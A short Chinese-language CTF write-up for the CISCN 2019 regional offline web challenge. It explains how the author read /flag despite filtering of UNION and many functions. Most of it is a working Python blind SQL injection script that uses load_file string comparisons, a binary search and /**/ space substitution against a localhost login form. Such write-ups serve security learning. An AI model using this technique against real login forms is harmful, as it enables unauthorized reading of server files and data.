ciscn2019 华东南赛区线下赛WEB第一题

题目过滤了union 和大量的sql函数，本意是想让人读文件，当时心太急了没做出来，现在复习一下，脚本很简单，利用的是ascii的字符串比较 如
select load_file('/flag')>='A'
select load_file('/flag')>='AB'
select load_file('/flag')>='ABC'
select load_file('/flag')>='ABCD'
简单利用这个逻辑可以写出一个二分的做法
直接看代码吧

import requests
url = 'http://localhost/index.php'
def func(x):
	x = x.replace(' ','/**/')
	return x
flag = ''
def check(mid,mystr):
	username = """hack' or binary (select load_file('/flag'))>='{0}'#"""
	username = func(username)
	username = username.format(mystr)
	password = 'hack'
	r = requests.post(url=url,data={'username':username,'password':password})	
	return 'success' in r.content
		
for i in range(1,20):
	left = 0
	right = 255
	while left < right:
		mid = (left+right+1)>>1
		if check(mid,flag+chr(mid)):
			left = mid
		else:
			right = mid-1
	flag += chr(left)
	print flag